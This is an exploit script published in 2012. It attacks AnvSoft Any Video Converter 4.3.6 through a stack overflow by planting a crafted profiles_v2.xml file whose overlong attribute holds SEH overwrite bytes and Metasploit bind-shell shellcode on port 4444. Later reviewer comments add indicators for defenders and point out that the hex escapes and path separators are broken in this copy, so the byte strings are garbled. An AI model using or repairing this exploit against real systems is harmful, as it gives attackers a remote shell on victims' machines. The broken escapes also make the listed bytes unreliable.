
# Title : AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
# Published : 2012-05-03
# Author :


#!/usr/bin/python
#
# Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
# Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
# Website: http://www.spentera.com
# Platform: Windows
# Tested on: Windows XP SP3
# Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
# 

import os,shutil,time,sys

def banner():
    """Print the title and credit lines of the script to stdout."""
    # Strings are kept exactly as they appear in this listing.
    lines = (
        "ntAnvSoft Any Video Converter 4.3.6 Stack Overflow",
        "tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)",
        "tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera researchn",
        "t----------------------------------------------------n",
    )
    for line in lines:
        print line

# Leading parts of the over-long value that is later placed in the XML
# "name" attribute: filler first, then two 4-byte fields.
# The variable names suggest the two fields overwrite a structured-exception
# (SEH) record on the stack -- inferred from naming, not shown by this file.
# If so, this is the class of corruption that SafeSEH/SEHOP exist to block;
# the header lists Windows XP SP3 as the only tested platform.
# NOTE(review): in this copy of the listing the backslashes of the hex
# escapes are missing, so these literals, and every length derived from
# them, are not the byte strings the author intended.
junk = "x90" * 328  # filler; 328 is presumably the offset on the tested build -- confirm
nseh = "xebx06x90x90"  # first 4-byte field (name suggests "next SEH")
seh  = "xe4xf3x04x10"  # second 4-byte field (name suggests the handler slot)

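# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# badchars = "x00x0ax0dx22x26x3e"
# Per the generator line above, `code` is a stock Metasploit bind payload, not
# custom code. For detection, the host-side indicator is therefore the
# converter process opening a TCP listener on port 4444 after it starts.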
code = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax48"
"x58x30x41x30x50x42x6bx42x41x58x41x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x59x79x69x6cx30"
"x6ax78x6bx32x6dx78x68x4bx49x4bx4fx4bx4fx4bx4fx41"
"x70x6cx4bx30x6cx51x34x66x44x6ex6bx72x65x35x6cx6c"
"x4bx73x4cx67x75x30x78x67x71x68x6fx4cx4bx50x4fx47"
"x68x4ex6bx41x4fx67x50x55x51x7ax4bx42x69x6cx4bx74"
"x74x4cx4bx36x61x78x6ex74x71x4bx70x4fx69x6ex4cx4f"
"x74x4bx70x70x74x65x57x4ax61x6bx7ax56x6dx47x71x4b"
"x72x5ax4bx58x74x35x6bx72x74x75x74x34x68x30x75x4b"
"x55x4cx4bx43x6fx57x54x36x61x68x6bx72x46x4ex6bx56"
"x6cx30x4bx6ex6bx43x6fx65x4cx67x71x4ax4bx44x43x54"
"x6cx4cx4bx6fx79x70x6cx74x64x35x4cx70x61x39x53x57"
"x41x69x4bx50x64x6cx4bx47x33x70x30x6cx4bx57x30x76"
"x6cx6cx4bx72x50x45x4cx6ex4dx4cx4bx53x70x43x38x63"
"x6ex55x38x6cx4ex30x4ex54x4ex78x6cx42x70x69x6fx6e"
"x36x53x56x63x63x70x66x33x58x54x73x36x52x53x58x61"
"x67x34x33x57x42x41x4fx53x64x39x6fx5ax70x45x38x68"
"x4bx7ax4dx39x6cx57x4bx66x30x6bx4fx49x46x63x6fx4b"
"x39x79x75x65x36x4fx71x58x6dx47x78x63x32x70x55x73"
"x5ax37x72x4bx4fx68x50x70x68x4ex39x74x49x4cx35x4c"
"x6dx71x47x4bx4fx4ax76x32x73x63x63x50x53x50x53x31"
"x43x52x63x73x63x47x33x33x63x59x6fx4ex30x31x76x30"
"x68x77x61x51x4cx31x76x51x43x4dx59x6ax41x6fx65x45"
"x38x4fx54x66x7ax50x70x6ax67x66x37x79x6fx6ex36x61"
"x7ax64x50x33x61x42x75x69x6fx6ax70x33x58x4cx64x6e"
"x4dx56x4ex39x79x73x67x4bx4fx7ax76x72x73x70x55x59"
"x6fx58x50x61x78x6ax45x41x59x6dx56x42x69x66x37x4b"
"x4fx4ex36x46x30x76x34x31x44x50x55x69x6fx4ex30x6e"
"x73x75x38x6bx57x64x39x49x56x43x49x46x37x39x6fx4b"
"x66x66x35x39x6fx68x50x75x36x62x4ax43x54x72x46x65"
"x38x65x33x70x6dx4fx79x6bx55x32x4ax46x30x46x39x41"
"x39x38x4cx4dx59x4dx37x41x7ax52x64x4fx79x6bx52x70"
"x31x4bx70x4cx33x4fx5ax49x6ex77x32x76x4dx69x6ex31"
"x52x64x6cx4ex73x4ex6dx43x4ax34x78x6ex4bx6ex4bx6c"
"x6bx50x68x62x52x4bx4ex78x33x54x56x4bx4fx73x45x32"
"x64x39x6fx38x56x61x4bx32x77x43x62x70x51x73x61x71"
"x41x63x5ax44x41x31x41x43x61x63x65x56x31x6bx4fx4e"
"x30x53x58x4cx6dx5ax79x54x45x58x4ex33x63x4bx4fx6b"
"x66x50x6ax39x6fx4bx4fx70x37x4bx4fx38x50x4ex6bx62"
"x77x49x6cx4cx43x49x54x43x54x69x6fx5ax76x56x32x79"
"x6fx6ex30x50x68x53x4ex6ax78x7ax42x44x33x52x73x39"
"x6fx4ex36x79x6fx68x50x48")

# Pad so that code + sisa is exactly 1000 characters, then build the XML text.
# As the author wrote it, the attribute value is 328 + 4 + 4 + 1000 = 1336
# bytes; the figure differs in this copy because the escape backslashes are
# missing (len(code) is computed on the literal as written).
sisa = "x90" * (1000-len(code)) 

# The document is a minimal profile list with one <category> element. The
# only abnormal part is the "name" attribute, which carries the whole
# junk + nseh + seh + code + sisa string instead of a short label.
# For triage: a category name of that length in profiles_v2.xml is the
# file-level indicator, and the other attributes are ordinary values.
poc = "<root>n"
poc+= "<categories>n"
poc+= "<category name=""+junk+nseh+seh+code+sisa+"" id="0" icon="cat_all.bmp" desc="All Profiles"/>n"
poc+= "</categories>n"
poc+= "<groups></groups>n<profiles></profiles>n</root>n"

# Drop stage: write the crafted document to ./profiles_v2.xml, then copy it
# into the application's install directory.
# Nothing below touches the network or a running process. The final message
# tells the operator to start the converter, so the file is presumably parsed
# at program start and the effect depends on a user launching the application.
#
# Defender notes:
#  - The artifact is a replaced profiles_v2.xml inside the install directory,
#    so file-integrity monitoring on that path catches the change.
#  - The copy needs write access to the install directory. Where that
#    directory is writable only by administrators, a standard user should
#    land in the IOError branch below.
#  - After launch, a listening socket on TCP 4444 owned by the converter
#    process is the runtime indicator (port taken from the payload comment
#    and the last status message).
#
# NOTE(review): `file` shadows the Python 2 builtin of the same name.
# NOTE(review): the path literal has lost its separators in this copy.
file = "profiles_v2.xml"
splash=os.path.abspath(file)
profdir="C:Program FilesAnvSoftAny Video Converter Professional"

# NOTE(review): open() runs before the platform and directory checks. When the
# script exits early, an empty profiles_v2.xml is left in the working
# directory and the handle is never closed.
writeFile = open(file, "w")
if os.name == 'nt':
	if os.path.isdir(profdir):
		try:
			writeFile.write(poc)
			banner()
			print "[*] Creating the malicious",file
			time.sleep(1)
			print "[*] Malicious",file,"created.."
			writeFile.close()
			# copy2 also copies the source file's metadata to the destination
			shutil.copy2(splash,profdir)
			print "[*] File",file,"has been copied to",profdir
			print "[*] Now open AnvSoft program and telnet to port 4444"
		except IOError:
			# covers failures of both the local write and the copy
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()